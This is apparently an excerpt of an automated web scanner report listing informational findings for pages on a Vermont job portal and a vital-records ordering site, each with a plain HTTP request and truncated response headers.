PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

26.67. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_warn_dsp.cfm

Request

GET /ada/mn_warn_dsp.cfm?def=false HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:12:07 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

26.68. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/services/schools/schsearch.cfm

Request

GET /ada/services/schools/schsearch.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:59 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

26.69. https://www.vermontjoblink.com/ada/works/FAQ.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/works/FAQ.cfm

Request

GET /ada/works/FAQ.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

26.70. https://www.vermontjoblink.com/ada/works/Login.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/works/Login.cfm

Request

GET /ada/works/Login.cfm HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:04 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

26.71. https://www.vermontjoblink.com/ada/works/contactus.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/works/contactus.cfm

Request

GET /ada/works/contactus.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

26.72. https://www.vermontjoblink.com/ada/works/employeroverview.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/works/employeroverview.cfm

Request

GET /ada/works/employeroverview.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:50 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

26.73. https://www.vermontjoblink.com/ada/works/joboverview.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/works/joboverview.cfm

Request

GET /ada/works/joboverview.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:50 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

26.74. https://www.vermontjoblink.com/ada/works/jobsearch.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/works/jobsearch.cfm

Request

GET /ada/works/jobsearch.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:49 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

26.75. https://www.vermontjoblink.com/ada/works/linkview.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/works/linkview.cfm

Request

GET /ada/works/linkview.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:51 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
server-error: true
Content-Type: text/html; charset=UTF-8
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/

Bookmark Error <b>You may be seeing this error as a result of bookmarking this page. Unfortunately, our site design will not allow the bookmarking of most internal pages.</b> If you wish to contact th
...[SNIP]...

26.76. https://www.vermontjoblink.com/ada/works/resourcesoverview.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/works/resourcesoverview.cfm

Request

GET /ada/works/resourcesoverview.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:50 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

26.77. https://www.vitalchek.com/AjaxFAQServer.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vitalchek.com
Path:   /AjaxFAQServer.aspx

Request

POST /AjaxFAQServer.aspx HTTP/1.1
Host: www.vitalchek.com
Connection: keep-alive
Referer: https://www.vitalchek.com/order_main.aspx
Origin: https://www.vitalchek.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
